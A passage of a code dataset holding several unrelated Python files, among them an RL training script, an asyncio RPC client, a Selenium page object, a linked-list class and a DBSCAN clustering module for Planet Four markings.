new_worlds\n\n log.info(f'({len(buffer)}/{buffer_len}) actor stepped')\n\n # Optimize\n chunk, buffer = as_chunk(buffer, n_envs)\n optimize(network, scaler, opt, chunk[idxs])\n log.info('learner stepped')\n\n yield torch.cat([p.grad.flatten() for p in network.parameters() if p.grad is not None])\n\ndef official_way(gs, 
Bsmall):\n Gbig2 = gs.mean(0).pow(2).mean()\n Gsmall2 = gs.pow(2).mean(1).mean()\n\n Bbig = gs.size(0)*Bsmall\n\n G2 = 1/(Bbig - Bsmall)*(Bbig*Gbig2 - Bsmall*Gsmall2)\n S = 1/(1/Bsmall - 1/Bbig)*(Gsmall2 - Gbig2)\n\n return arrdict.arrdict(S=S, G2=G2, B=(S/G2)).item()\n\ndef sensible_way(gs, Bsmall):\n S = Bsmall*(gs - gs.mean(0, keepdims=True)).pow(2).mean()\n G2 = gs.mean(0).pow(2).mean()\n return arrdict.arrdict(S=S, G2=G2, B=(S/G2)).item()\n\ndef adam_way(run, i, Bsmall):\n sd = storage.load_snapshot(run, i)\n beta1, beta2 = sd['opt']['param_groups'][0]['betas']\n step = sd['opt']['state'][0]['step']\n\n m_bias = 1 - beta1**step\n v_bias = 1 - beta2**step\n\n opt = sd['opt']['state']\n m = 1/m_bias*torch.cat([s['exp_avg'].flatten() for s in opt.values()])\n v = 1/v_bias*torch.cat([s['exp_avg_sq'].flatten() for s in opt.values()])\n\n # Follows from chasing the var through the defn of m\n inflator = (1 - beta1**2)/(1 - beta1)**2\n\n S = Bsmall*(v.mean() - m.pow(2).mean())\n G2 = inflator*m.pow(2).mean()\n\n return arrdict.arrdict(\n S=S, G2=G2, B=(S/G2), \n v=v.mean(),\n m=m.mean(),\n m2=m.pow(2).mean(),\n step=torch.as_tensor(step)).item()\n\ndef run():\n run, idx = '*that-man', -1\n B = 16*1024\n\n gs = []\n for _, g in zip(range(32), gradients(run, idx)):\n log.info(f'{len(gs)} gradients')\n gs.append(g)\n gs = torch.stack(gs).cpu()\n\n # official 27668.0\n # sensible 25460.0\n # adam 20961.0\n stats = pd.DataFrame(dict(\n official=official_way(gs, B),\n sensible=sensible_way(gs, B),\n adam=adam_way(run, -1, B)))\n\ndef adam_over_time(run, B):\n import matplotlib.pyplot as plt\n from tqdm.auto import tqdm\n sizes = arrdict.stack([adam_way(run, idx, B) for idx in tqdm(storage.snapshots(run))])\n plt.plot(sizes)\n\n ","sub_path":"experiments/gradnoise.py","file_name":"gradnoise.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161118746","text":"from setuptools import setup, find_packages\n\n# get required packages for the Pipfile or requirements file\ntry:\n from pipenv.project import Project\n from pipenv.utils import convert_deps_to_pip\n\n pfile = Project().parsed_pipfile\n requirements = convert_deps_to_pip(pfile['packages'], r=False)\n test_requirements = convert_deps_to_pip(pfile['dev-packages'], r=False)\nexcept ImportError:\n # get the requirements from the requirements.txt\n requirements = [line.strip()\n for line in open('requirements/prod.txt').readlines()\n if line.strip() and not line.startswith('#')]\n # get the test requirements from the test_requirements.txt\n test_requirements = [line.strip()\n for line in\n open('requirements/dev.txt').readlines()\n if line.strip() and not line.startswith('#')]\n\n# get the version\nwith open('{{cookiecutter.app_name}}/__init__.py', 'r') as f:\n for line in f:\n if line.startswith('__version__'):\n version = line.strip().split('=')[-1].strip(' \\'\"')\n break\n else:\n version = '0.0.1'\n\nBUILD_REQUIRED_FILES = (\n 'LICENSE',\n 'AUTHORS.rst',\n 'CONTRIBUTING.rst',\n 'HISTORY.rst',\n 'README.md',\n 'Pipfile',\n 'Pipfile.lock',\n 'requirements/prod.txt',\n 'requirements/dev.txt'\n)\n\nreadme = open('README.md').read()\nhistory = open('HISTORY.rst').read().replace('.. 
:changelog:', '')\n\nsetup(\n    name='{{cookiecutter.app_name}}',\n    version=version,\n    description='{{cookiecutter.project_short_description}}',\n    long_description=readme,\n    url='''https://github.com/Eventador/{{ cookiecutter.app_name }}''',\n    packages=find_packages(where='.', exclude=['tests']),\n    package_dir={'''{{ cookiecutter.app_name }}''': '''{{ cookiecutter.app_name }}'''},\n    include_package_data=True,\n    install_requires=requirements,\n    zip_safe=False,\n\n    test_suite='pytest',\n    tests_require=test_requirements,\n    data_files=[('', BUILD_REQUIRED_FILES)],\n\n    entry_points={\n        'console_scripts': [\n            '{{cookiecutter.app_name}} = {{cookiecutter.app_name}}.manage:cli'\n        ]\n    }\n)\n","sub_path":"{{cookiecutter.app_name}}/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"474173086","text":"import tensorflow as tf\nimport gym\nfrom gym.spaces import Discrete, Box\nimport pybullet_envs\nimport numpy as np\nimport sys\nimport datetime\nfrom matplotlib import pyplot as plt\n\nfrom Algorithms.REINFORCE import REINFORCE\nfrom Algorithms.VPG import VPG\nfrom Algorithms.TRPO import TRPO\nfrom Algorithms.PPO import PPO\n\nfrom Algorithms.DQN import DQN\nfrom Algorithms.DDQN import DDQN\nfrom Algorithms.Dueling_DQN import Dueling_DQN\n\nfrom Algorithms.DDPG import DDPG\nfrom Algorithms.TD3 import TD3\nfrom Algorithms.SAC_v1 import SAC_v1\nfrom Algorithms.SAC_v2 import SAC_v2\n\nfrom Networks.Atari_Network import Atari_Actor, Atari_V_network\n\nnp.set_printoptions(threshold=sys.maxsize)\n\nclass Gym_trainer:\n    def __init__(self, env, algorithm, max_action, min_action, train_mode, render=True, max_episode = 1e6):\n        self.env = env\n        self.algorithm = algorithm\n\n        self.max_action = max_action\n        self.min_action = min_action\n\n        self.render = render\n        self.max_episode = max_episode\n\n        self.episode = 0\n        self.episode_reward = 0\n        self.total_step = 0\n        self.local_step = 0\n\n        if train_mode == 'offline':\n            self.train_mode = self.offline_train\n        elif train_mode == 'online':\n            self.train_mode = self.online_train\n        elif train_mode == 'batch':\n            self.train_mode = self.batch_train\n\n    def offline_train(self, d, local_step):\n        if d:\n            return True\n        return False\n\n    def online_train(self, d, local_step):\n        return True\n\n    def batch_train(self, d, local_step):#VPG, TRPO, PPO only\n        if d or local_step == self.algorithm.batch_size:\n            return True\n        return False\n\n\n\n    def run(self):\n\n        while True:\n            if self.episode > self.max_episode:\n                print(\"Training finished\")\n                break\n\n            self.episode += 1\n            self.episode_reward = 0\n            self.local_step = 0\n\n            observation = self.env.reset()\n            #observation = np.array(observation, dtype='float32')\n            observation = tf.image.rgb_to_grayscale(tf.image.resize(np.array(self.env.render(mode='rgb_array'), dtype='float32'), [160, 240]))\n            observation = observation.numpy()\n\n\n            done = False\n\n            while not done:\n                self.local_step += 1\n                self.total_step += 1\n\n                if self.render == True:\n                    #self.env.render()\n                    #print(np.shape(np.array(self.env.render(mode='rgb_array'))))\n                    next_observation = tf.image.resize(np.array(self.env.render(mode='rgb_array'), dtype='float32'), [160,240])\n                    next_observation = tf.image.rgb_to_grayscale(next_observation)\n                    next_observation = next_observation.numpy()\n                    #plt.imshow(np.array(next_observation, dtype='int32')[:,:,0])\n                    #plt.show()\n                if self.total_step <= self.algorithm.training_start:\n                    action = self.env.action_space.sample()\n                    _, reward, 
done, _ = self.env.step(action)\n next_observation = np.array(next_observation, dtype='float32')\n\n else:\n action = self.algorithm.get_action(observation)\n _, reward, done, _ = self.env.step(self.max_action * action)\n next_observation = np.array(next_observation, dtype='float32')\n\n self.episode_reward += reward\n\n self.algorithm.buffer.add(observation, action, reward, next_observation, done)\n observation = next_observation\n\n\n if self.total_step >= self.algorithm.training_start and self.train_mode(done, self.local_step):\n self.algorithm.train(training_num=self.algorithm.training_step)\n\n\n print(\"Episode: {}, Reward: {}, Local_step: {}, Total_step: {}\".format(self.episode, self.episode_reward, self.local_step, self.total_step))\n\n\ndef main(cpu_only = False, force_gpu = True):\n #device setting\n #################################################################################\n if cpu_only == True:\n cpu = tf.config.experimental.list_physical_devices(device_type='CPU')\n tf.config.experimental.set_visible_devices(devices=cpu, device_type='CPU')\n\n if force_gpu == True:\n gpu = tf.config.experimental.list_physical_devices('GPU')\n tf.config.experimental.set_memory_growth(gpu[0], True)\n\n #################################################################################\n\n #discrete env\n #################################################################################\n env = gym.make(\"CartPole-v0\")\n #env = gym.make(\"MountainCar-v0\")\n #env = gym.make(\"Acrobot-v1\")\n\n #################################################################################\n #continuous env\n #################################################################################\n #env = gym.make(\"Pendulum-v0\")\n #env = gym.make(\"MountainCarContinuous-v0\")\n\n #env = gym.make(\"InvertedTriplePendulumSwing-v2\")\n #env = gym.make(\"InvertedTriplePendulum-v2\")\n #env = gym.make(\"InvertedDoublePendulumSwing-v2\")\n #env = gym.make(\"InvertedDoublePendulum-v2\")\n #env = gym.make(\"InvertedPendulumSwing-v2\")#around 10000 steps\n\n #env = gym.make(\"InvertedPendulum-v2\")\n\n #env = gym.make(\"Ant-v2\")\n #env = gym.make(\"HalfCheetah-v2\")\n #env = gym.make(\"Hopper-v2\")\n #env = gym.make(\"Humanoid-v3\")\n #env = gym.make(\"HumanoidStandup-v2\")\n #env = gym.make(\"Reacher-v2\")\n #env = gym.make(\"Swimmer-v2\")\n #env = gym.make(\"Walker2d-v2\")\n #################################################################################\n\n #env = gym.make(\"Pong-v4\")\n\n #env setting\n #################################################################################\n state_dim = env.observation_space.shape[0]\n\n if isinstance(env.action_space, Discrete):\n action_dim = env.action_space.n\n max_action = 1\n min_action = 1\n discrete = True\n elif isinstance(env.action_space, Box):\n action_dim = env.action_space.shape[0]\n max_action = env.action_space.high[0]\n min_action = env.action_space.low[0]\n discrete = False\n else:\n raise NotImplementedError\n #################################################################################\n\n #algorithm for discrete env\n #################################################################################\n algorithm = DQN(state_dim, action_dim, Atari_Actor((160, 240, 1), action_dim), Atari_Actor((160, 240, 1), action_dim))\n #algorithm = DDQN(state_dim, action_dim)\n #algorithm = Dueling_DQN(state_dim, action_dim)\n #atari_algorithm = DQN(state_dim, action_dim, )\n\n\n 
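    # note: this DQN is built with two Atari_Actor networks (presumably the online\n    # and target Q-networks) sized for the 160x240 grayscale frames that\n    # Gym_trainer.run() renders from the environment.\n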
#################################################################################\n\n #algorithm for continuous env\n #################################################################################\n #algorithm = DDPG(state_dim, action_dim)\n #algorithm = TD3(state_dim, action_dim)\n #algorithm = SAC_v1(state_dim, action_dim)\n #algorithm = SAC_v2(state_dim, action_dim, auto_alpha=True)\n\n #algorithm for both env\n #################################################################################\n #offline training only for REINFORCE, VPG, TRPO, PPO\n #algorithm = TRPO(state_dim, action_dim, discrete)\n #algorithm = PPO(state_dim, action_dim, discrete, mode='clip', clip=0.2)\n #algorithm= PPO(state_dim, action_dim, discrete, mode='Adaptive KL', dtarg=0.01)\n #algorithm = PPO(state_dim, action_dim, discrete, mode='Fixed KL', beta=3)\n #algorithm = REINFORCE(state_dim, action_dim, discrete)\n #algorithm = VPG(state_dim, action_dim, discrete)\n\n #################################################################################\n print(\"Training of\", env.unwrapped.spec.id)\n print(\"Algorithm:\", algorithm.name)\n print(\"State dim:\", state_dim)\n print(\"Action dim:\", action_dim)\n print(\"Max action:\", max_action)\n print(\"Min action:\", min_action)\n print(\"Discrete: \", discrete)\n\n trainer = Gym_trainer(env=env, algorithm=algorithm, max_action=max_action, min_action=min_action, train_mode='offline', render=True)\n trainer.run()\n\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"97811622","text":"# Finding lowest number of a list.\n\nnumbers = [-5, 23, 0, -9, 12, 99, 105, -43]\nlength = len(numbers)\nmin = numbers[0]\ni = 1\nwhile i < length:\n if min > numbers[i]:\n min = numbers[i]\n i += 1\n else:\n min = min\n i += 1\nprint(\"Minimum of the list is: \", min)\n","sub_path":"exercise/min.py","file_name":"min.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"434989309","text":"import os\n\n\ndef rename_files():\n\ttarget_path = \"./prank/prank\"\n\n\tfile_list = os.listdir(target_path)\n\n\tstart_path = os.getcwd()\n\tos.chdir(target_path)\n\n\tfor file_name in file_list:\n\t\tnew_name = file_name.translate(None, \"0123456789\")\n\t\tos.rename(file_name, new_name)\n\t\tprint (\"Rename file \" + file_name + \" to \" + new_name)\n\n\tos.chdir(start_path)\n\nrename_files()","sub_path":"modulo_1/aula_5/prank/rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"198425449","text":"import io\nimport logging\nimport struct\nimport asyncio\nfrom time import monotonic\n\nimport msgpack\n\nfrom aiomisc.entrypoint import entrypoint\n\n\nlog = logging.getLogger('client')\n\n\nclass RPCClient:\n HEADER = struct.Struct(\">I\")\n\n def __init__(self, reader: asyncio.StreamReader,\n writer: asyncio.StreamWriter,\n loop: asyncio.AbstractEventLoop = None):\n\n self.reader = reader\n self.writer = writer\n self.packer = msgpack.Packer(use_bin_type=True)\n self.unpacker = msgpack.Unpacker(raw=False)\n self.serial = 0\n self.futures = {}\n self.loop = loop or asyncio.get_event_loop()\n self.reader_task = self.loop.create_task(self._response_reader())\n\n async def 
_response_reader(self):\n try:\n while True:\n body_size = self.HEADER.unpack(\n await self.reader.readexactly(self.HEADER.size)\n )[0]\n\n self.unpacker.feed(\n await self.reader.readexactly(body_size)\n )\n\n body = self.unpacker.unpack()\n\n future = self.futures.pop(body['id'], None)\n\n if future is None:\n continue\n\n if 'error' in body:\n future.set_exception(Exception(\n body['error']['type'],\n *body['error']['args']\n ))\n continue\n\n future.set_result(body['result'])\n finally:\n while self.futures:\n _, future = self.futures.popitem()\n\n if future.done():\n continue\n\n future.set_exception(ConnectionAbortedError)\n\n async def close(self):\n self.writer.write(self.HEADER.pack(0))\n\n self.reader_task.cancel()\n await asyncio.gather(self.reader_task, return_exceptions=True)\n\n self.loop.call_soon(self.writer.close)\n self.writer.write_eof()\n self.writer.close()\n\n def __call__(self, method, **kwargs):\n self.serial += 1\n\n self.futures[self.serial] = self.loop.create_future()\n\n with io.BytesIO() as f:\n body = self.packer.pack({\n 'id': self.serial,\n 'method': method,\n 'params': kwargs,\n })\n\n f.write(self.HEADER.pack(len(body)))\n f.write(body)\n\n self.writer.write(f.getvalue())\n\n return self.futures[self.serial]\n\n\nasync def main(host, port):\n log.info('Connecting to %s:%d', host, port)\n reader, writer = await asyncio.open_connection(host, port)\n client = RPCClient(reader, writer)\n\n call_count = 300\n\n delta = - monotonic()\n\n for i in range(call_count):\n await asyncio.gather(*[\n client('multiply', x=120000, y=1000000) for _ in range(call_count)\n ])\n\n delta += monotonic()\n\n total_request_sent = (call_count ** 2)\n\n log.info(\"Total executed %d requests on %.3f\", total_request_sent, delta)\n log.info(\"RPS: %.3f\", total_request_sent / delta)\n\n await client.close()\n log.info('Close connection')\n\n\nif __name__ == '__main__':\n with entrypoint() as loop:\n loop.run_until_complete(main(\"::1\", 5678))\n","sub_path":"examples/rpc/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"42838407","text":"# Copyright (c) 2015 App Annie Inc. 
All rights reserved.\nimport re\nfrom tests.qa.pages.storestats.common_page import SSCommonPage\nfrom tests.qa.utils import logger\n\n\nclass FeatureHistoryPage(SSCommonPage):\n \"\"\"\n Page structure:\n 1 Global level: Header/Footer, Sidebar, App Container\n 2 In app container: App info, App dashboard\n 3 In app dashboard: Dashboard header, Dashboard control group, Dashboard view\n 3.1 dashboard header\n 3.2 In dashboard control group: control group buttons, dashboard subtitle\n 3.3 In dashboard view: chart, table\n\n This page object aims to structure in 3\n\n Loading procedure in 3,1 & 3.2\n this section will follow the whole page and no ajax made.\n\n Loading procedure in 3.3\n 1 play loading animation\n 2 set width of div contains loading animation to 0\n 3 show chart and table / set contains(a div element) of error message display:none to display:block\n\n Loading procedure tricked by control group\n seam as above\n\n Loading procedure tricked by chart control (Reach / Frequency button)\n hide chart\n play loading animation in chart container\n show chart / set contains(a div element) of error message display:none to display:block\n \"\"\"\n\n url = '/apps/{}/{}/{}/featured'\n https = False\n\n css_dashboard_header = \".dashboard-header\"\n\n css_control_group = \".control-group\"\n css_control_group_breakdown = css_control_group + ' div[data-qa-element=\"breakdown\"]'\n css_control_group_country = css_control_group + ' div[data-qa-element=\"country\"] .current'\n css_control_group_category = css_control_group + ' div[data-qa-element=\"category\"] .current'\n css_control_group_type = css_control_group + ' div[data-qa-element=\"type\"] .current'\n css_control_group_device = css_control_group + ' div[data-qa-element=\"device\"] .current'\n css_control_group_date = css_control_group + ' div[data-qa-element=\"date\"] .current'\n\n css_dashboard_subtitle = \".dashboard-sub-header\"\n css_chart = \".chart-container\"\n css_table = \".table-container\"\n css_table_row = \".main-row\"\n\n css_popup = \".aa-popup\"\n css_popup_item = css_popup + \" .aa-popup-body li span\"\n css_popup_col = css_popup + \" .picker-col\"\n\n css_date_selector = \".aa_selector\"\n css_date_input_start_date = css_date_selector + \" .start-input-date\"\n css_date_input_end_date = css_date_selector + \" .end-input-date\"\n css_date_input_done = css_date_selector + \" .ui-datepicker-close\"\n\n def get_control_group(self):\n return self.find_element_by_css(self.css_control_group)\n\n def get_control_group_country(self):\n return self.find_element_by_css(self.css_control_group_country)\n\n def get_control_group_category(self):\n return self.find_element_by_css(self.css_control_group_category)\n\n def get_control_group_type(self):\n return self.find_element_by_css(self.css_control_group_type)\n\n def get_control_group_device(self):\n return self.find_element_by_css(self.css_control_group_device)\n\n def get_control_group_date(self):\n return self.find_element_by_css(self.css_control_group_date)\n\n def get_dashboard_subtitle(self):\n return self.find_element_by_css(self.css_dashboard_subtitle)\n\n def get_control_group_breakdown_item(self, name):\n breakdown = self.find_element_by_css(self.css_control_group_breakdown)\n return self.find_sub_element_by_xpath('//li/span[text()=\"{}\"]'.format(name), breakdown)\n\n # need call get_control_group_breakdown_item(\"date\").click() first\n def fill_control_group_date(self, start_date, end_date):\n beg = self.find_element_by_css(self.css_date_input_start_date)\n beg.clear()\n 
beg.send_keys(start_date)\n        end = self.find_element_by_css(self.css_date_input_end_date)\n        end.clear()\n        end.send_keys(end_date)\n\n    def click_control_group_date_done_button(self):\n        self.find_element_by_css(self.css_date_input_done).click()\n\n    def click_control_group_popup_item(self, name):\n        items = self.find_elements_by_css(self.css_popup_item)\n        for item in items:\n            if item.text.strip() == name:\n                item.click()\n                return\n        raise Exception(\"Popup item not found: \" + name)\n\n    def click_control_group_subcategory(self, *categories):\n        queue = list(categories)\n        current = 0\n\n        while current < len(queue):\n            cols = self.find_elements_by_css(self.css_popup_col)\n            cells = cols[current].find_elements_by_css_selector(\"li span\")\n            for cell in cells:\n                if cell.text.strip() == queue[current]:\n                    if current == len(queue) - 1:\n                        cell.click()\n                        return\n                    else:\n                        cell.find_element_by_xpath(\"../..\").find_element_by_css_selector(\"a.indicator\").click()\n                        break\n            else:\n                raise Exception(\"Category not found\")\n            current += 1\n\n    def get_table_content(self):\n        ret = []\n        items = self.find_elements_by_css(self.css_table_row)\n        for row in items:\n            tds = row.find_elements_by_tag_name('td')\n            ret.append([x.text.strip() for x in tds[1:4]])\n        return ret\n","sub_path":"tests/qa/pages/storestats/feature_history_page.py","file_name":"feature_history_page.py","file_ext":"py","file_size_in_byte":5317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"143175270","text":"from itertools import zip_longest\n\n\nclass ImproperNodeException(Exception):\n    \"\"\"Just cause...\"\"\"\n\n\nclass Node:\n\n    def __init__(self, d):\n        self.data = d\n        self.next = None\n\n    def __repr__(self):\n        return '[%s]' % self.data\n\n\nclass LinkedList:\n\n    def __init__(self, values=None):\n        self.head = None\n        if values:\n            for value in values:\n                self.add(value)\n\n    def __eq__(self, other):\n        self_values = list(self.values())\n        other_values = list(other.values())\n        if len(self_values) != len(other_values):\n            return False\n\n        for v1, v2 in zip(self_values, other_values):\n            if v1 != v2:\n                return False\n\n        return True\n\n    def __add__(self, other):\n        elements = zip_longest(\n            reversed(list(self.values())),\n            reversed(list(other.values())),\n            fillvalue=0\n        )\n        remainder = 0\n        to_return = LinkedList()\n\n        for v1, v2 in elements:\n\n            if not isinstance(v1, int) or not isinstance(v2, int):\n                raise TypeError('This only works for integers.')\n\n            if v1 > 9 or v2 > 9:\n                raise TypeError('This only works for integers less than 10.')\n\n            total = (v1 + v2 + remainder)\n            val = total % 10\n            # carry when the digit sum reaches 10 (e.g. 5 + 5 -> digit 0, carry 1)\n            remainder = 1 if total >= 10 else 0\n            to_return.add(val)\n\n        if remainder:\n            to_return.add(remainder)\n\n        return to_return\n\n    def __len__(self):\n        return len(list(iter(self)))\n\n    def __getitem__(self, index):\n        return list(iter(self))[index]\n\n    def __iter__(self):\n        node = self.head\n        while node:\n            yield node\n            node = node.next\n\n    def values(self):\n        for node in self:\n            yield node.data\n\n    def add(self, d):\n        node = Node(d)\n        node.next = self.head\n        self.head = node\n\n    @staticmethod\n    def delete(node):\n        if not node or not node.next:\n            raise ImproperNodeException\n\n        node.data = node.next.data\n        node.next = node.next.next\n\n    def kth_to_last(self, k):\n        \"\"\"Return the k-th to last node (k=1 is the tail), or None if k is out of range.\"\"\"\n        lead = trail = self.head\n        # move the lead pointer k nodes ahead of the trailing pointer\n        for _ in range(k):\n            if lead is None:\n                return None\n            lead = lead.next\n        # advance both pointers until lead falls off the end; trail is then k-th to last\n        while lead:\n            lead = lead.next\n            trail = trail.next\n        return trail\n\n    def remove_duplicates(self):\n\n        data_set = set()\n        prev_node = None\n\n        for node in self:\n            if node.data in 
data_set:\n prev_node.next = node.next\n else:\n data_set.add(node.data)\n prev_node = node\n\n def partition(self, value):\n \"\"\"Shift linked list so that all elements less than value are\n before all elements greater than or equal to value.\n\n :param value: Partition value\n\n e.g 3 > 2 > 2 > 10 > 3 > 1 [partition = 3]\n output = 2 > 2 > 1 > 3 > 3 > 10\n \"\"\"\n\n less_than = LinkedList()\n greater_than = LinkedList()\n\n for node in self:\n if node.data < value:\n less_than.add(node.data)\n else:\n greater_than.add(node.data)\n\n less_than[-1].next = greater_than.head\n\n return less_than\n\n def __repr__(self):\n node = self.head\n nodes = []\n while node:\n nodes.append(str(node))\n node = node.next\n return ' -> '.join(nodes)\n\n\n\n\n\n\n\n","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"58042395","text":"from django.urls import path\nfrom . import views\n\"\"\"\nRemember that pages like wish list, which shows a list and also accepts\nboth GET and POST request.\nGET request, show form and list of places\nPOST request, add new place to DB then redirects to a list of places\n\n\"\"\"\n\nurlpatterns = [\n path('',views.place_list, name='place_list'), # Make sure to add commas next to each path.\n path('visited', views.places_visited, name = 'places_visited'), # name refers to the url path \n path('place//was_visited', views.place_was_visited, name='place_was_visited'), ## Created for the \"Visited!\" button\n path('place/', views.place_details, name ='place_details'),\n path('place//delete', views.delete_place, name='delete_place'),\n]","sub_path":"wishlist/travel_wishlist/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"274573379","text":"from __future__ import division, print_function\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\n\nfrom . 
import markings, p4io\nfrom .exceptions import NoDataToClusterError, UnknownClusteringScopeError\n\nmatplotlib.style.use('bmh')\n\n\nclass DBScanner(object):\n\n marking_cols = {'fan': 'angle spread distance'.split(),\n 'blotch': 'angle radius_1 radius_2'.split()}\n MarkingClass = {'fan': markings.Fan,\n 'blotch': markings.Blotch}\n\n def __init__(self, data, kind, eps=10, min_samples=3,\n scope='planet4',\n ax=None, linestyle='-', quiet=True):\n self.data = data\n self.kind = kind # fans or blotches\n self.eps = eps\n self.min_samples = min_samples\n if scope == 'planet4':\n self.coords = ['x', 'y']\n elif scope == 'hirise':\n self.coords = ['hirise_x', 'hirise_y']\n else:\n raise UnknownClusteringScopeError\n self.scope = scope\n self.ax = ax\n self.linestyle = linestyle\n self.quiet = quiet\n\n # these lines execute the clustering\n self.get_current_X()\n self.run_DBSCAN()\n self.post_analysis()\n\n def get_current_X(self):\n current_X = self.data[self.coords].values\n if len(current_X) == 0:\n raise NoDataToClusterError\n self.current_X = current_X\n\n def run_DBSCAN(self):\n db = DBSCAN(self.eps, self.min_samples).fit(self.current_X)\n labels = db.labels_.astype('int')\n self.core_samples = db.core_sample_indices_\n unique_labels = set(labels)\n self.n_clusters = len(unique_labels) - (1 if -1 in labels else 0)\n self.labels = labels\n self.unique_labels = unique_labels\n if not self.quiet:\n print(\"Estimated number of clusters:\", self.n_clusters)\n\n def post_analysis(self):\n colors = plt.cm.Spectral(np.linspace(0, 1, len(self.unique_labels)))\n reduced_data = []\n n_rejected = 0\n for k, color in zip(self.unique_labels, colors):\n label_members = [i[0] for i in np.argwhere(self.labels == k)]\n if k == -1: # i.e. if it's noise\n n_rejected = len(label_members)\n if self.ax:\n self.process_plotting(k, label_members)\n if k > -0.5: # i.e. if it's not noise marking\n cluster = self.get_mean_marking(label_members)\n cluster.n_members = len(label_members)\n reduced_data.append(cluster)\n if self.ax:\n self.process_cluster_plotting(cluster, color)\n if self.ax:\n markings.set_subframe_size(self.ax)\n self.reduced_data = reduced_data\n self.n_rejected = n_rejected\n\n @property\n def n_reduced_data(self):\n return len(self.reduced_data)\n\n def get_mean_marking(self, label_members):\n # what columns to pick for averaging. 
Depends on\n # what kind (fans/blotches) we have:\n cols = self.coords + self.marking_cols[self.kind]\n clusterdata = self.data[cols].iloc[label_members]\n meandata = clusterdata.mean()\n if self.scope == 'hirise':\n meandata['x'] = meandata.hirise_x\n meandata['y'] = meandata.hirise_y\n return self.MarkingClass[self.kind](meandata)\n\n def process_cluster_plotting(self, cluster, color):\n cluster.set_color(color)\n if self.kind == 'blotch':\n self.ax.add_artist(cluster)\n else:\n self.ax.add_line(cluster)\n cluster.add_semicircle(self.ax, color=color)\n cluster.add_mean_wind_pointer(self.ax, color=color,\n ls=self.linestyle)\n\n def process_plotting(self, k, label_members):\n if k == -1: # process noise markers\n color = 'w'\n markersize = 5\n for i in label_members:\n x = self.current_X[i]\n if i in self.core_samples and k != -1:\n markersize = 8\n else:\n markersize = 5\n self.ax.plot(x[0], x[1], 'o', markerfacecolor=color,\n markedgecolor='k', markersize=markersize)\n\n\nclass ClusteringManager(object):\n def __init__(self, dbname, scope='hirise'):\n self.db = p4io.DBManager(dbname)\n self.dbname = dbname\n self.scope = scope\n self.confusion = []\n self.dbscanners = []\n self.clustered_fans = []\n self.clustered_blotches = []\n\n @property\n def n_clustered_fans(self):\n return len(self.clustered_fans)\n\n @property\n def n_clustered_blotches(self):\n return len(self.clustered_blotches)\n\n def cluster_data(self, data):\n for kind in ['fan', 'blotch']:\n markings = data[data.marking == kind]\n dbscanner = DBScanner(markings, kind, scope=self.scope)\n self.confusion.append((self.data_id, kind, len(markings),\n dbscanner.n_reduced_data,\n dbscanner.n_rejected))\n if kind == 'fan':\n self.clustered_fans.extend(dbscanner.reduced_data)\n else:\n self.clustered_blotches.extend(dbscanner.reduced_data)\n\n def cluster_image_id(self, image_id):\n self.data_id = image_id\n self.p4id = markings.ImageID(image_id, self.dbname)\n self.cluster_data(self.p4id.data)\n\n def cluster_image_name(self, image_name):\n data = self.db.get_image_name_markings(image_name)\n self.data_id = image_name\n self.cluster_data(data)\n\n def cluster_all(self):\n image_names = self.db.image_names\n for i, image_name in enumerate(image_names):\n print('{:.1f}'.format(100 * i / len(image_names)))\n data = self.db.get_image_name_markings(image_name)\n self.data_id = image_name\n self.cluster_data(data)\n\n\ndef gold_star_plotter(gold_id, axis, blotches=True, kind='blotches'):\n for goldstar, color in zip(markings.gold_members,\n markings.gold_plot_colors):\n if blotches:\n gold_id.plot_blotches(user_name=goldstar, ax=axis,\n user_color=color)\n if kind == 'fans':\n gold_id.plot_fans(user_name=goldstar, ax=axis, user_color=color)\n markings.gold_legend(axis)\n\n\ndef main():\n gold_ids = p4io.common_gold_ids()\n\n p4img = markings.ImageID(gold_ids[10])\n golddata = p4img.data[p4img.data.user_name.isin(markings.gold_members)]\n golddata = golddata[golddata.marking == 'fan']\n # citizens = set(p4img.data.user_name) - set(markings.gold_members)\n\n # create plot window\n fig, ax = plt.subplots(ncols=2, nrows=2, figsize=(12, 10))\n fig.tight_layout()\n axes = ax.flatten()\n\n # fill images, 0 and 2 get it automatically\n for i in [1, 3]:\n p4img.show_subframe(ax=axes[i])\n\n # remove pixel coord axes\n for ax in axes:\n ax.axis('off')\n\n # citizen stuff\n p4img.plot_fans(ax=axes[0])\n axes[0].set_title('Citizen Markings')\n DBScanner(p4img.get_fans(), 'fan', ax=axes[1], eps=7, min_samples=5,\n linestyle='-')\n 
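    # (DBScanner's __init__ runs the clustering and draws the clusters onto the given axis as a side effect)\n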
